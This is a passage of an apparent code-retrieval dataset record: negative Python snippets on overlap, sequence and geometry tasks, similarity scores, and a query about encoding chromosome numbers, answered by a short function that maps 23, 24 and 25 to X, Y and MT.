self.convert_track_to_pin(coord)\n # Compute the overlap with that rectangle\n overlap_rect=pin.compute_overlap(full_pin)\n # Determine the max x or y overlap\n max_overlap = max(overlap_rect)\n if max_overlap>0:\n any_overlap.update([coord])\n \n return any_overlap", "def overlap_with(self, other):", "def find_overlapping(seq, subseq):\n \n pos, count = 0, 0\n while True:\n pos = seq.find(subseq, pos)\n if pos < 0:\n break\n pos += 1 \n count += 1\n return count", "def startEndPoints(mazz):\n for i in range (len(mazz)):\n for j in range (len(mazz[i])):\n if mazz[i][j] == 6:\n startx = i\n starty = j\n elif mazz[i][j] == 7:\n endx = i\n endy = j\n return startx, starty, endx, endy", "def _contiguous_ranges(span_list):\n output = []\n for _, span in itertools.groupby(\n enumerate(span_list), lambda p: p[1] - p[0]):\n span = list(span)\n output.append((span[0][1], span[-1][1]))\n return output", "def flyc_nofly_cord_pos_search(po, fwmdlfile, start_pos, func_align, data_align, min_match_accepted):\n fwmdlfile.seek(0, os.SEEK_END)\n fwmdlfile_len = fwmdlfile.tell()\n enfcord = FlycNoFlyCoords()\n match_count = 0\n match_pos = -1\n match_entries = 0\n reached_eof = False\n pos = start_pos\n while (True):\n # Check how many correct zone entries we have\n entry_count = 0\n entry_pos = pos\n while (True):\n fwmdlfile.seek(entry_pos, os.SEEK_SET)\n if fwmdlfile.readinto(enfcord) != sizeof(enfcord):\n reached_eof = True\n break\n # The array ends with int value storing its size\n if (entry_count >= min_match_accepted) and (enfcord.latitude == entry_count):\n break\n if not flyc_nofly_is_proper_cord_entry(po, fwmdlfile, fwmdlfile_len, enfcord, func_align, data_align, pos, entry_pos):\n break\n entry_count += 1\n entry_pos += sizeof(enfcord)\n # Do not allow entry at EOF\n if (reached_eof):\n break\n # If entry is ok, consider it a match\n if entry_count > min_match_accepted:\n if (po.verbose > 1):\n print(\"{}: Matching coords array at 0x{:08x}: {:d} entries\".format(po.mdlfile,pos,entry_count))\n if (entry_count >= match_entries):\n match_pos = pos\n match_entries = entry_count\n match_count += 1\n # Set position to search for next entry\n if entry_count >= min_match_accepted:\n pos += entry_count * sizeof(enfcord)\n else:\n pos += data_align - (pos%data_align)\n if (match_count > 1):\n eprint(\"{}: Warning: multiple ({:d}) matches found for fly coords array with alignment 0x{:02x}\".format(po.mdlfile,match_count,data_align))\n if (match_count < 1):\n return -1, 0\n return match_pos, match_entries", "def overlaps(x1, x2, y1, y2):\n\n return x1 <= y2 and y1 
<= x2", "def rm_scns_intersect(self, all_scns=False):\n if self.scn_intersect:\n import rsgislib.vectorutils\n logger.debug(\"Creating Database Engine and Session.\")\n db_engine = sqlalchemy.create_engine(self.db_info_obj.dbConn)\n session_sqlalc = sqlalchemy.orm.sessionmaker(bind=db_engine)\n ses = session_sqlalc()\n logger.debug(\"Perform query to find scenes which need downloading.\")\n\n if all_scns:\n scns = ses.query(EDDSentinel1ASF).order_by(EDDSentinel1ASF.Acquisition_Date.asc()).all()\n else:\n scns = ses.query(EDDSentinel1ASF).filter(EDDSentinel1ASF.Downloaded == False).order_by(\n EDDSentinel1ASF.Acquisition_Date.asc()).all()\n\n if scns is not None:\n eodd_vec_utils = eodatadown.eodatadownutils.EODDVectorUtils()\n vec_idx, geom_lst = eodd_vec_utils.create_rtree_index(self.scn_intersect_vec_file,\n self.scn_intersect_vec_lyr)\n\n for scn in scns:\n logger.debug(\"Check Scene '{}' to check for intersection\".format(scn.PID))\n rsgis_utils = rsgislib.RSGISPyUtils()\n north_lat = scn.North_Lat\n south_lat = scn.South_Lat\n east_lon = scn.East_Lon\n west_lon = scn.West_Lon\n # (xMin, xMax, yMin, yMax)\n scn_bbox = [west_lon, east_lon, south_lat, north_lat]\n\n intersect_vec_epsg = rsgis_utils.getProjEPSGFromVec(self.scn_intersect_vec_file,\n self.scn_intersect_vec_lyr)\n if intersect_vec_epsg != 4326:\n scn_bbox = rsgis_utils.reprojBBOX_epsg(scn_bbox, 4326, intersect_vec_epsg)\n\n has_scn_intersect = eodd_vec_utils.bboxIntersectsIndex(vec_idx, geom_lst, scn_bbox)\n if not has_scn_intersect:\n logger.info(\"Removing scene {} from Sentinel-1 as it does not intersect.\".format(scn.PID))\n ses.query(EDDSentinel1ASF.PID).filter(EDDSentinel1ASF.PID == scn.PID).delete()\n ses.commit()\n ses.close()", "def find_contour(hole_atoms, atom_list):\n contour_atoms = []\n extra_atoms = []\n global bond_list\n bond_list = bond_list_1\n for atom in hole_atoms:\n c = [bond[0] for bond in identify_bonds(atom, atom_list) if ((bond[0] not in hole_atoms) and (bond[0] not in contour_atoms))]\n for element in c:\n contour_atoms.append(element)\n for atom in atom_list:\n c = [bond[0] for bond in identify_bonds(atom, atom_list)]\n count = 0\n for element in c:\n if element in contour_atoms:\n count += 1\n if (count >= 2):\n extra_atoms.append(atom)\n for atom in atom_list:\n c = [bond[0] for bond in identify_bonds(atom, atom_list)]\n for element in c:\n if ((element in contour_atoms) or (element in extra_atoms)):\n for i in [bond[0] for bond in identify_bonds(element, atom_list)]:\n if ((i in hole_atoms) and (atom not in hole_atoms) and (atom not in contour_atoms) and (atom not in extra_atoms)):\n extra_atoms.append(atom) \n \n contour_atoms = contour_atoms + extra_atoms\n \n extra_atoms2 = []\n for atom in contour_atoms:\n for atom2 in contour_atoms:\n if (atom != atom2):\n c = [bond[0] for bond in identify_bonds(atom, atom_list) if ((bond in identify_bonds(atom2, atom_list)) and (bond[0] not in (contour_atoms)))]\n if (len(c) != 0):\n extra_atoms2.append(c[0]) \n for element in extra_atoms2:\n contour_atoms.append(element)\n return contour_atoms", "def locateInflectionPoint(self, start, end, list):\n if end-start > 10:\n for x in range(start+5, end-5):\n if (list[x] < list[x-1] and list[x] < list[x-2] and list[x] < list[x-3]\n and #list[x] < list[x-4] and list[x] < list[x-5] and\n list[x] < list[x+1] and list[x] < list[x+2] and list[x] < list[x+3]):\n #and list[x] < list[x+4] and list[x] < list[x+5]):\n self.inflections += 1", "def find_LCS(seq1, seq2, all=False):\n C = [[0 for j in range(len(seq2) + 1)] 
for i in range(len(seq1) + 1)]\n\n for i in range(1, len(seq1) + 1):\n for j in range(1, len(seq2) + 1):\n inter = seq1[i - 1].intersection(seq2[j - 1])\n\n C[i][j] = max([C[i - 1][j - 1] + len(inter),\n C[i - 1][j],\n C[i][j - 1]])\n\n # now we need to backtrack the structure to get the pattern\n if all:\n all_lcs = backtrack_all_LCS(C, seq1, seq2, len(seq1), len(seq2))\n return {i[1:] for i in all_lcs}\n\n lcs = []\n backtrack_LCS(C, seq1, seq2, len(seq1), len(seq2), lcs)\n return lcs", "def _get_intersections():\n with _get_mongo_client() as client:\n coll = client[mongo_database]['locations']\n return coll.find({'intersection_number': {'$exists': True}}, {'_id': False})" ]
[ "0.6343779", "0.5909693", "0.5851059", "0.57616645", "0.5732729", "0.568256", "0.5675713", "0.56729394", "0.5659118", "0.56387144", "0.5623953", "0.558914", "0.5588006", "0.5570414", "0.55475664", "0.5545426", "0.5528489", "0.5526816", "0.5525146", "0.5520476", "0.5492296", "0.5491623", "0.5450726", "0.5413808", "0.5407713", "0.5399254", "0.53888637", "0.53869677", "0.5373511", "0.53723156", "0.5370139", "0.53578293", "0.5338607", "0.533228", "0.5321556", "0.53123134", "0.52841103", "0.52837086", "0.52749896", "0.5262743", "0.5258874", "0.5250571", "0.5243211", "0.5241573", "0.5237652", "0.52314276", "0.5231056", "0.52254695", "0.52200854", "0.5214407", "0.52135575", "0.51995665", "0.5196762", "0.51921487", "0.5187422", "0.5180529", "0.51727736", "0.51504546", "0.51502675", "0.5142768", "0.51409495", "0.5140664", "0.5140289", "0.51377594", "0.5133773", "0.51301336", "0.5125089", "0.5123136", "0.512312", "0.5117282", "0.51127535", "0.51043767", "0.5093431", "0.50925153", "0.50920117", "0.50890124", "0.5088957", "0.5084334", "0.50785685", "0.5077387", "0.5073449", "0.5072427", "0.5071769", "0.5070553", "0.5067407", "0.50579566", "0.50559187", "0.505439", "0.5053055", "0.5051645", "0.50493455", "0.5047618", "0.50445944", "0.5036161", "0.503317", "0.5032396", "0.50303566", "0.50257283", "0.5022315", "0.502211" ]
0.7374044
0
Encodes chromosome to same cn
def encode_chromosome(in_num):
    convert_dict = {23: "X", 24: "Y", 25: "MT"}
    return convert_dict[in_num] if in_num in convert_dict else str(in_num)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __encode(self):\n\n for i, char in enumerate(self.__chars):\n self.__char2idx[char] = i\n self.__idx2char[i] = char", "def encode(self, C, num_rows):\n x = np.zeros((num_rows, len(self.chars)))\n print(C)\n for i, c in enumerate(C):\n x[i, self.char_indices[c]] = 1\n return x", "def encode(self, C, num_rows):\n x = np.zeros((num_rows, len(self.chars)))\n for i, c in enumerate(C):\n x[i, self.char_indices[c]] = 1\n return x", "def encode(self, C, num_rows):\n x = np.zeros((num_rows, len(self.chars)))\n for i, c in enumerate(C):\n x[i, self.char_indices[c]] = 1\n return x", "def encode(self):\n\n # Start from occupancy\n encoding = self.occupancy.copy();\n\n # Add goals\n for g in self.goals:\n if g in self.discovered_goals:\n encoding[self.tocellcoord[g]] += 10\n else:\n encoding[self.tocellcoord[g]] += 100\n\n # Add agents\n for pos in self.currstate:\n encoding[self.tocellcoord[pos]] += 2\n\n return encoding", "def encode_char(self, char):\n\n # Pass char through plugboard\n if self.plugboard is not None:\n char = self.plugboard.encode(char)\n\n # Convert char to an index\n idx = ord(char) % 65\n\n # Rotate Rotors\n self.rotate_rotors()\n\n # Forward pass through rotors\n for i, rotor in enumerate(self.rotors):\n _, idx = rotor.encode_right_to_left(idx)\n\n # Pass through reflector\n _, idx = self.reflector.encode_right_to_left(idx)\n\n # Backwards pass through rotors\n for rotor in reversed(self.rotors):\n _, idx = rotor.encode_left_to_right(idx)\n\n # Output char\n char = chr(65 + idx)\n\n # Pass char through plugboard\n if self.plugboard is not None:\n char = self.plugboard.encode(char)\n\n return char", "def encode(self, seq):", "def encode(self, char):\n\n if char == self.pair[0]:\n return self.pair[1]\n elif char == self.pair[1]:\n return self.pair[0]\n else:\n return char", "def encode(self, letter):\n\n for plug in self.plugleads:\n if plug.pair[0] == letter or plug.pair[1] == letter:\n return plug.encode(letter)\n return letter", "def sc2selfies(chromosome):\n selfie = \"\".join(x for x in list(chromosome))\n return selfie", "def encode_pos(i, j):\n return 3 * i + j", "def change(coor):\n return chr(coor[0] + 65), coor[1] + 1", "def mapChrForVersion(c):\n\tif c.startswith('chrM'):\n\t\treturn 998\n\telif c == 'chrX':\n\t\treturn 999\n\telif c == 'chrY':\n\t\treturn 1000\n\telse:\n\t\treturn int(c[3:])", "def encode_identifier(alphabet, n):\r\n c = alphabet[n & 0b1111]\r\n n>>=4\r\n while n > 0:\r\n c = c + alphabet[n & 0b111111]\r\n n>>=6\r\n return c", "def binaryEncode(peptide):\n\n #do 1 hot encoding\n binaryPeptide=''\n for aa in peptide:\n binaryAmino=''\n if aa =='A':\n binaryAmino='10000000000000000000'\n if aa =='R':\n binaryAmino='01000000000000000000'\n if aa =='N':\n binaryAmino='00100000000000000000'\n if aa =='D':\n binaryAmino='00010000000000000000'\n if aa =='C':\n binaryAmino='00001000000000000000'\n if aa =='Q':\n binaryAmino='00000100000000000000'\n if aa =='E':\n binaryAmino='00000010000000000000'\n if aa =='G':\n binaryAmino='00000001000000000000'\n if aa =='H':\n binaryAmino='00000000100000000000'\n if aa =='I':\n binaryAmino='00000000010000000000'\n if aa =='L':\n binaryAmino='00000000001000000000'\n if aa =='K':\n binaryAmino='00000000000100000000'\n if aa =='M':\n binaryAmino='00000000000010000000'\n if aa =='F':\n binaryAmino='00000000000001000000'\n if aa =='P':\n binaryAmino='00000000000000100000'\n if aa =='S':\n binaryAmino='00000000000000010000'\n if aa =='T':\n binaryAmino='00000000000000001000'\n if aa =='W':\n 
binaryAmino='00000000000000000100'\n if aa =='Y':\n binaryAmino='00000000000000000010'\n if aa =='V':\n binaryAmino='00000000000000000001'\n binaryPeptide=binaryPeptide +binaryAmino\n if len(binaryPeptide) == 500*20:\n break \n \n while len(binaryPeptide) < 500*20:\n binaryPeptide = binaryPeptide +str(0)\n \n binaryPeptide = np.array(list(binaryPeptide),dtype=float)\n binaryPeptide = np.reshape(binaryPeptide,(binaryPeptide.shape[0],1))\n binaryPeptide = np.transpose(binaryPeptide)\n return binaryPeptide", "def encode_left_to_right(self, index_in):\n\n char_pins = self.pins[index_in]\n index_out = self.mapping.index(char_pins)\n char_out = self.pins[index_out]\n return char_out, index_out", "def mutate(self, chrom):\n pass", "def bed_encoding(bed_df, reference):\n\n fasta = Fasta(reference, as_raw=True)\n seq_list = list()\n for _, i in bed_df.iterrows():\n print(f\"region:{i[0]}:{i[1]}-{i[2]}\")\n seq_list.append(one_hot_encoding(fasta[i[0]][i[1]:i[2]]))\n result = np.stack(seq_list)\n return result", "def to_chromosome(chromosome):\n\n if isinstance(chromosome, make_chromosome):\n return chromosome\n else:\n return make_chromosome(chromosome)", "def _encode(self, upper):\n return upper", "def encode(num):\n encode = ''\n \n if (num < 0):\n return ''\n \n while (num >= base_count): \n mod = num % base_count\n encode = alphabet[mod] + encode\n num = num // base_count\n \n if (num):\n encode = alphabet[num] + encode\n \n return encode", "def apply_on_chromosome(self, func, **kwargs):\n func(self, **kwargs)", "def save(self, *args, **kwargs):\n self.chromosome_no = CHROMOSOME_STR_TO_CHROMOSOME_INT.get(self.chromosome, 0)\n super().save(*args, **kwargs)", "def save(self, *args, **kwargs):\n self.chromosome_no = CHROMOSOME_STR_TO_CHROMOSOME_INT.get(self.chromosome, 0)\n super().save(*args, **kwargs)", "def increment_chromosome(mutated_genome):\n index1 = random.randint(0,max(0,len(mutated_genome)-2))\n seed = random.randint(0,2)\n if seed == 0:\n index2 = index1 + 1\n elif seed == 1:\n index2 = random.randint(index1,max(index1,len(mutated_genome)-1))\n else: #seed == 2:\n index2 = max(0,len(mutated_genome)-1)\n temp = mutated_genome[index1]\n mutated_genome[index1] = mutated_genome[index2]\n mutated_genome[index2] = temp", "def encode1(s,n):\n r = \"\"\n for l in s:\n l = ord(l) # convert to ascii\n l = l - 97 # 'a' is 97 so we want to reduce so 'a'=0 'b'=1 etc\n l = l + n # add the offset\n l=l%26 # use mod so that we wrap around back to 'a' if we go past 'z'\n l=l+97 # and add back the 97\n r = r + chr(l)\n return r", "def encode(self,agent_pos,drone_pos):\n\n codeSize = self.width * self.height * 3\n\n array = np.zeros(shape=(self.width, self.height, 3), dtype='uint8')\n\n for j in range(0, self.height):\n for i in range(0, self.width):\n\n v = self.get(i, j)\n\n if v == None:\n continue\n\n array[i, j, 0] = OBJECT_TO_IDX[v.type]\n array[i, j, 1] = COLOR_TO_IDX[v.color]\n\n array[agent_pos[0],agent_pos[1],0]=10\n array[agent_pos[0],agent_pos[1],1]=10\n array[drone_pos[0],drone_pos[1],0]=15\n array[drone_pos[0],drone_pos[1],1]=15\n\n\n\n return array", "def encode_instruction(instruction: str) -> int:\n\ta, b, c = convert_instruction(instruction)\n\treturn encode_pair(a, encode_pair(b, c))", "def encode(src):\n if not src:\n return None\n\n output = scramble(src)\n\n return ' '.join(output[i:i+5] for i in xrange(0, len(output), 5))", "def encode_rgi(rgi_df, genome_ids):\n rgi_encoded = pd.DataFrame(index=genome_ids,\n columns=rgi_df['Best_Hit_ARO'].unique()).fillna(0)\n # print(rgi_encoded)\n 
for genome_id, rgi_data in rgi_df.iterrows():\n rgi_encoded.loc[rgi_data['Sample'], rgi_data['Best_Hit_ARO']] += 1\n\n return rgi_encoded", "def fix_chromosome(self, copy=False):\n region = self.copy() if copy else self\n if region.chromosome.startswith('chr'):\n region.chromosome = region.chromosome[3:]\n else:\n region.chromosome = 'chr' + region.chromosome\n return region", "def BCH_encode(self,parameter,correcting_capability):\n\n bits = np.array(self.image_bits)\n code = komm.BCHCode(parameter,correcting_capability)\n \n if (len(bits)%code.dimension > 0):\n \n bits = np.append(bits, [np.zeros(self.calculate_zeros_addition_BCH(parameter,correcting_capability),dtype = np.uint8)])\n number_of_arrays = int(len(bits)/code.dimension)\n parts_to_encode = np.reshape(bits,(number_of_arrays,-1),order ='C')\n\n encoded_parts =[]\n for i in range (0, len(parts_to_encode)):\n encoded_part = code.encode(parts_to_encode[i])\n encoded_parts.append(encoded_part)\n encoded_parts = np.array(encoded_parts)\n\n return encoded_parts\n\n elif (len(bits)%code.dimension == 0):\n number_of_arrays = int(len(bits)/code.dimension)\n parts_to_encode = np.reshape(bits,(number_of_arrays,-1),order ='C')\n\n encoded_parts =[]\n for i in range (0, len(parts_to_encode)):\n encoded_part = code.encode(parts_to_encode[i])\n encoded_parts.append(encoded_part)\n encoded_parts = np.array(encoded_parts)\n\n return encoded_parts", "def encoder(ne, nj):\n #contrainte sup les equipes ne peuvent pas s'affronter elles-meme\n contrainte = ''\n for e in range(ne):\n for j in range(nj):\n contrainte += str(-codage(ne,nj,j,e,e))+' 0\\n'\n return contrainte+encoderC1(ne, nj) +'\\n'+ encoderC2(ne, nj)+'\\n'+ \\\n contrainteExtDimanche(ne,nj,0.5)+'\\n'+contrainteDomDimanche(ne,nj,0.4)+'\\n'+ \\\n contrainteExtConsecutif(ne,nj)+'\\n'+contrainteDomConsecutif(ne,nj)", "def encode_rna(x):\n return [0 if y == 'A' else 1 if y == 'U' else 2 if y == 'G' else 3 for y in x]", "def makeCode(self, code):\n\n current_charset = None\n pos = sum = 0\n skip = False\n strCode = ''\n for c in range(len(code)):\n if skip:\n skip = False\n continue\n\n # Only switch to char set C if next four chars are digits\n if len(code[c:]) >= 4 and code[c:c + 4].isdigit() and current_charset != self.CharSetC or \\\n len(code[c:]) >= 2 and code[c:c + 2].isdigit() and current_charset == self.CharSetC:\n # If char set C = current and next two chars ar digits, keep C\n if current_charset != self.CharSetC:\n # Switching to Character set C\n if pos:\n strCode += self.ValueEncodings[current_charset['Code C']]\n sum += pos * current_charset['Code C']\n else:\n strCode = self.ValueEncodings[self.CharSetC['START C']]\n sum = self.CharSetC['START C']\n current_charset = self.CharSetC\n pos += 1\n elif code[c] in self.CharSetB and current_charset != self.CharSetB and \\\n not (code[c] in self.CharSetA and current_charset == self.CharSetA):\n # If char in chrset A = current, then just keep that\n # Switching to Character set B\n if pos:\n strCode += self.ValueEncodings[current_charset['Code B']]\n sum += pos * current_charset['Code B']\n else:\n strCode = self.ValueEncodings[self.CharSetB['START B']]\n sum = self.CharSetB['START B']\n current_charset = self.CharSetB\n pos += 1\n elif code[c] in self.CharSetA and current_charset != self.CharSetA and \\\n not (code[c] in self.CharSetB and current_charset == self.CharSetB):\n # if char in chrset B== current, then just keep that\n # Switching to Character set A\n if pos:\n strCode += self.ValueEncodings[current_charset['Code A']]\n sum 
+= pos * current_charset['Code A']\n else:\n strCode += self.ValueEncodings[self.CharSetA['START A']]\n sum = self.CharSetA['START A']\n current_charset = self.CharSetA\n pos += 1\n\n if current_charset == self.CharSetC:\n val = self.CharSetC[code[c:c + 2]]\n skip = True\n else:\n val = current_charset[code[c]]\n\n sum += pos * val\n strCode += self.ValueEncodings[val]\n pos += 1\n\n # Checksum\n checksum = sum % 103\n\n strCode += self.ValueEncodings[checksum]\n\n # The stop character\n strCode += self.ValueEncodings[current_charset['STOP']]\n\n # Termination bar\n strCode += \"11\"\n\n return strCode", "def chromosome_mutation(chromosome: str, nurses_number: int = 10):\n\n # The number of genes in the chromosome is generated\n genes = 21 * nurses_number\n\n # Random index to mutate\n index = randrange(0, genes)\n\n # New Chromosome to be returned\n new_chromosome = chromosome[:index]\n\n # Condition to mutate\n if chromosome[index] == '0':\n new_chromosome += '1'\n else:\n new_chromosome += '0'\n\n new_chromosome += chromosome[index + 1:]\n\n # Returning the new chromosome\n return new_chromosome", "def encode(record: int) -> str:\r\n result = ''\r\n queue = record\r\n while queue:\r\n remainder = queue % BASE\r\n queue = floor(queue / BASE)\r\n result = CODEX[remainder] + result\r\n return result", "def encode2(s,n):\n r = [ chr(((ord(x)-97+n)%26)+97) if x!=' ' else x for x in s]\n return \"\".join(r)", "def bin_code(self):\n self.alphabet = np.unique(self.sequence)\n\n for s, n in zip([chr(k + ord('a') - 1) for k in self.alphabet], self.alphabet):\n self.alphabet_symbol[s] = n\n\n sigm = len(self.alphabet)\n bin_code = []\n for i, e in enumerate(self.alphabet):\n em = [0] * sigm\n em[sigm - 1 - i] = 1\n bin_code.append(em)\n\n for i in range(len(bin_code)):\n self.alphabet_dict[self.alphabet[i]] = bin_code[i]\n\n return reduce(lambda r, e: r + self.alphabet_dict[e], self.sequence, [])", "def encode_right_to_left(self, index_in):\n\n char_out = self.mapping[index_in]\n index_out = self.pins.index(char_out)\n return char_out, index_out", "def encode(self, state):\n raise NotImplementedError", "def test_encode_pair():\n\tassert encode_pair(0, 0) == 0\n\tassert encode_pair(1, 0) == 1\n\tassert encode_pair(0, 1) == 2\n\tassert encode_pair(4, 6) == 207", "def encode(self, decoded):", "def __setitem__(self, index, chromosome):\n\n # Just one chromosome\n if isinstance(index, int):\n self.chromosome_list[index] = to_chromosome(chromosome)\n\n # Multiple chromosomes\n else:\n self.chromosome_list[index] = [to_chromosome(item) for item in chromosome]", "def encode(n):\n encode = []\n if n < 0:\n return ''\n while n >= 58:\n remainder = n % 58\n encode.append(LETTERS[remainder])\n n = n / 58\n if n:\n encode.append(LETTERS[n])\n return ''.join(reversed(encode))", "def _coord_to_bin(self,code):\n\t\tbinary = \"\"\n\t\tfor num in code:\n\t\t\tbinary += '{0:02b}'.format(int(num))\n\t\tassert ( len(binary) == 16 )\n\t\treturn binary", "def map_to_cigar(map):\n cigar = ''\n for span in map.spans:\n if isinstance(span, Span):\n num_chars = span.End-span.Start\n char = 'M'\n else:\n num_chars = span.length\n char = 'D'\n if num_chars == 1:\n cigar += char\n else:\n cigar += str(num_chars)+char\n return cigar", "def switch_chromosomes(mutated_genome):\n index1 = random.randint(0,max(0,len(mutated_genome)-1))\n index2 = random.randint(0,max(0,len(mutated_genome)-1))\n temp = mutated_genome[index1]\n mutated_genome[index1] = mutated_genome[index2]\n mutated_genome[index2] = temp", "def 
one_hot_encode_dna(dna_str, pad=None, base_order='ATCG'):\n dna_str = dna_str.upper()\n if pad is not None:\n M = pad\n else:\n M = len(dna_str)\n dna_arr = np.zeros((M, 4))\n for i in range(len(dna_str)):\n idx = base_order.index(dna_str[i])\n dna_arr[i, idx] = 1\n return dna_arr", "def buildCoder(shift):\n mapper={}\n for ch in string.ascii_lowercase:\n if (ord(ch)+shift)>ord('z'):\n mapper[ch]=chr(ord(ch)+shift-ord('z')+ord('a')-1)\n else:\n mapper[ch]=chr(ord(ch)+shift)\n for ch in string.ascii_uppercase:\n if (ord(ch)+shift)>ord('Z'):\n mapper[ch]=chr(ord(ch)+shift-ord('Z')+ord('A')-1)\n else:\n mapper[ch]=chr(ord(ch)+shift)\n return mapper", "def Codingfunc(N,L): #Coding:[N:number of repetitions, L:length of single/multiple sequence]\r\n C=0 #int variable containing code number\r\n if N==1:\r\n C=L-1\r\n else:\r\n C=-(L-1)*16-(N-1)\r\n #print(\"C =\",C,end=' ')\r\n \r\n return struct.pack('b',C)", "def GUI_Write_Encoder_Values(self):\n for i in range(3):\n self.encoder_text[i].set(\"%8s microns\"%str(self.read_pos[i]))\n return", "def encode(self, input_):\n return self.encoder(input_)", "def complement(chromosome, point1, point2):\r\n new_chromosome = \"\"\r\n\r\n for i in range(len(chromosome)):\r\n if i >= point1 and i <= point2:\r\n if chromosome[i] == '0':\r\n new_chromosome += '1'\r\n else:\r\n new_chromosome += '0'\r\n else:\r\n new_chromosome += chromosome[i]\r\n\r\n return new_chromosome", "def encode(self, peptides):\n raise NotImplementedError", "def encode(self, value):\r\n pass", "def encode(num, alphabet=BASE62):\n if num == 0:\n return alphabet[0]\n arr = []\n base = len(alphabet)\n while num:\n num, rem = divmod(num, base)\n arr.append(alphabet[rem])\n arr.reverse()\n return ''.join(arr)", "def mutate_chromosome(mutated_genome):\n seed = random.randint(0,5)\n if len(mutated_genome) <= 1: seed = 0\n if seed == 0:\n insert_chromosome(mutated_genome)\n elif seed == 1:\n remove_chromosome(mutated_genome)\n elif seed == 2:\n switch_chromosomes(mutated_genome)\n elif seed == 3:\n shuffle_chromosomes(mutated_genome)\n elif seed == 4:\n increment_chromosome(mutated_genome)\n else: #seed == 5:\n decrement_chromosome(mutated_genome)", "def __encode_ordinal(self):\n for key, value in self.ord_dict.items():\n if key in self.train_df.columns:\n if self.test_df is not None:\n self.test_df[key + str(\"Encoded\")] = self.test_df[key].map(\n value\n )\n self.test_df[key + str(\"Encoded\")] = self.test_df[\n key + str(\"Encoded\")\n ].astype(\"category\")\n\n self.train_df[key + str(\"Encoded\")] = self.train_df[key].map(\n value\n )\n self.train_df[key + str(\"Encoded\")] = self.train_df[\n key + str(\"Encoded\")\n ].astype(\"category\")\n self.ord_cols.append(key + str(\"Encoded\"))", "def mutate(chromosome, p):\n code = {'0':'1', '1':'0'}\n return ''.join(code[num] if random() < p else num for num in chromosome)", "def encode(self, string):\n\n encoded = np.zeros((len(string), len(self.__chars)))\n\n for i, c in enumerate(string):\n encoded[i, self.__char2idx[c]] = 1\n\n return encoded", "def codage(nbr):\n\tmask=1\n\tresult=0\n\tfor index in range(len(G)):\n\t\tif ((mask<<index)&nbr) != 0:\n\t\t\tresult^=G[len(G)-index-1]\n\treturn result", "def _encode(self, dataset):\n if self._look_up is None: # if we are encoding training set\n self._look_up = dict() # initialize look-up table as empty\n for col in dataset:\n if not is_numeric_dtype(dataset[col]): # for each column that is not numeric\n for val, label in enumerate(dataset[col].unique()): # attach a encode value for each of its 
label\n self._look_up[label] = val # add that value to the lookup table\n # Problem: Try other method of pandas for this task\n\n dataset.replace(self._look_up, inplace=True)", "def _generate_character_map(self):\n self._ct = [-1] * 256\n index = 0\n for c_range in self._meta.character_ranges:\n for c_pos in range(c_range['min'], c_range['max'] + 1):\n self._ct[c_pos] = index\n index += 1", "def icd9tocci(df,col_icd='icd9'):\n cci9 = load_cci9()\n return df.merge(cci9,how='left',left_on=col_icd,right_on='ICD-9-CM CODE')", "def encode(data, code_book):\n return np.array([int(chunk, 2).to_bytes(-(-len(chunk) // 8), byteorder='big') for chunk in\n map(lambda tup: ''.join(tup), (lambda iterable: zip_longest(*[iter(iterable)] * 8, fillvalue=''))(\n ''.join(map(lambda x: code_book[x], data))))])", "def cod(self):\n raise NotImplementedError(\"base class called\")", "def chrNum(self, num):\n char = chr(num + 65) \n return char", "def encode(bits, nt_to_bits=None):\r\n if nt_to_bits is None:\r\n nt_to_bits = DEFAULT_GOLAY_NT_TO_BITS\r\n\r\n bits = numpy.array(bits).reshape((12, 1))\r\n\r\n # cheap way to do binary xor in matrix dot\r\n res = numpy.dot(DEFAULT_G.T, bits)\r\n codeword = divmod(res.ravel(), 2)[1]\r\n\r\n return _bits_to_seq(codeword, nt_to_bits)", "def encode(self, value):\n raise NotImplementedError()", "def base62_encode(num, alphabet=ALPHABET):\n if (num == 0):\n return alphabet[0]\n arr = []\n base = len(alphabet)\n while num:\n rem = num % base\n num = num // base\n arr.append(alphabet[rem])\n arr.reverse()\n return ''.join(arr)", "def base62_encode(num, alphabet=ALPHABET):\n if (num == 0):\n return alphabet[0]\n arr = []\n base = len(alphabet)\n while num:\n rem = num % base\n num = num // base\n arr.append(alphabet[rem])\n arr.reverse()\n return ''.join(arr)", "def base62_encode(num, alphabet=ALPHABET):\n if (num == 0):\n return alphabet[0]\n arr = []\n base = len(alphabet)\n while num:\n rem = num % base\n num = num // base\n arr.append(alphabet[rem])\n arr.reverse()\n return ''.join(arr)", "def base62_encode(num, alphabet=ALPHABET):\n if (num == 0):\n return alphabet[0]\n arr = []\n base = len(alphabet)\n while num:\n rem = num % base\n num = num // base\n arr.append(alphabet[rem])\n arr.reverse()\n return ''.join(arr)", "def to_index(self, char):\n return ord(char) - ord(\"A\") - 32", "def encode(self,b):\n raise NotImplementedError('subclasses must override encode()!')", "def encoder(self, inputs):\n pass", "def encode_affine(msg, a, b):\n \n #Code to numbers\n encoded_message = [ RVALUES[(a * VALUES[i] + b) % 26] for i in msg ]\n \n return ''.join(encoded_message)", "def rivine_binary_encode(self, encoder):\n pass", "def chr_mod(value: int) -> str:\n return Base64._CHARSET[value % len(Base64._CHARSET)]", "def terrainEncoded(self, request, result):\n pass", "def encode(self, strs):", "def encode(self, strs):", "def encode(self, encode_data, image):\r\n raise NotImplementedError(\"Not Implemented\")", "def encode(self):\n if self.ciphered:\n raise CipherError(\"already encoded.\")\n try:\n self.result = self.doEncode(self.msg,self.shift)\n except Exception as e:\n raise CipherError(\"encoding failure: {}.\".format(e))\n self.ciphered = True\n return self.result", "def Ncen(self, m):\n pass", "def get_single_location(chrom, pos):\n return CHROMOSOME_TO_CODE[chrom] * int(1e9) + pos", "def encode(self):\n\n ret = {}\n ret[DC] = ''.join(encode_huffman(v, self.layer_type)\n for v in self.diff_dc)\n ret[AC] = ''.join(encode_huffman(v, self.layer_type)\n for v in 
